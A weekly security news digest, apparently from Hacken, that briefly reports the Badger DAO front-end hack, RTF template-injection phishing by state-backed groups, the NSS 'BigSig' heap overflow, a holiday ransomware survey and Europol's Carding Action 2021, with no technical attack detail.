Hacken Token
$ -- --.--

Weekly News Digest #63

$120 million hack affecting Badger DAO Protocol

Badger DAO Protocol has fallen victim to a hack, $120.3 million in cryptocurrencies was stolen from its users. The first messages from users mentioning possible problems were coming on Wednesday at 9 p.m. ET. According to the data provided by PeckShield, the total amount of lost assets included 2,100 BTC and 151 ETH. The hack may be the result of the exploit in the Badger.com user interface. When trying to claim yield farming rewards and interacting with Badger vaults, users were noticing spurious requests for additional permissions. 

Upon noticing these suspicious activities, Badger froze all the vaults. The project started an investigation to identify how many users were affected and how many assets were stolen. The malicious requests may have started coming to users weeks prior to the attack. Due to the hack, the price of the Badger DAO token has demonstrated a more than 20% decline.

Read more

Hackers use a simple technique to install malware on PCs

A simple technique is used by malicious state-backed actors to conduct phishing campaigns aimed at spreading malware and stealing information that may be demanded by their governments. According to the data provided by security experts from Proofpoint, hackers are working on behalf of Russian, Chinese, and Indian interests and use rich text format (RTF) template injections. The technique brings visible results to hackers since antivirus software used by many organizations doesn’t block RTF files by default. 

Attackers weaponize RTF files by altering their document-formatting properties to retrieve content from the URL they control. As a result, attackers can secretly retrieve a malware payload that gets installed on the targeted machine. This hacking technique has become so popular among state-backed hackers since it is easy to use while being reliable enough to reach their malicious targets.

Read more

Mozilla’s NSS Crypto Library critical bug may affect several other software

There is a risk that malicious actors can exploit Mozilla’s cross-platform Network Security Services (NSS) cryptographic library to crash the application or execute an arbitrary code. Mozilla has rolled out fixes to address a critical security weakness. The flaw is tracked CVE-2021-43527 and it affects NSS versions prior to 3.73 or 3.68.1 ESR. The flow concerns a heap overflow vulnerability. 

The bug codenamed “BigSig” is likely to have been exploited since June 2012. It is important to mention that although the bug does not affect Mozilla’s Firefox web browser itself, pdf viewers, email clients, and other applications using NSS for signature verification are likely to be vulnerable to the flaw. 

Read more

Much more ransomware attacks are detected during the Holiday Period

The security specialists representing the security company Cybereason have analyzed the state of ransomware during the Holiday Period and at weekends. They collected data from 500 UK professionals. 37% of respondents have admitted that their companies have no contingency plans in place to react to ransomware attacks during weekends or during Holiday Period. At the same time, almost 90% of respondents are concerned about the risk of facing ransomware attacks during these periods.

According to Cybereason CEO Lior Div, the most disruptive attacks in 2021 took place at weekends as well as during major holidays. Organizations are not prepared enough to address such cyber threats, neither appropriate technologies nor responsible officers are in place.

Read more

Record haul in anti-card fraud operation by police

The Carding Action 2021 led by Italy in partnership with the UK, leading card schemes, and Europol has saved European cardholders tens of millions of USD in cybercrime losses. The cross-border anti-fraud initiative targeted underground sites on which fraudsters and cybercriminals were stealing card data. The three-month operation has already resulted in the identification of 12 vendors selling stolen credit card data and the sum of prevented losses equals $16 million. 

However, only 50,000 stolen cards have been analyzed. The figure of prevented losses has been calculated by multiplying the average spending per card by the number of identified cards. Security specialists were analyzing such sources of compromised payment records as a botnet and JS-sniffer infrastructure. Carding Action 2021 is a great example of joint initiatives that play a key role in disrupting cybercrime globally. 

Read more

Subscribe to our research

Enter your email address to subscribe to Hacken Reseach and receive notifications of new posts by email.

    hackenproof logo

    The world trusted Bug Bounty Platform. Run custom-tailored Bug Bounty Programs to secure your business and assets.

    hackenproof logo

    The world trusted Bug Bounty Platform. Run custom-tailored Bug Bounty Programs to secure your business and assets.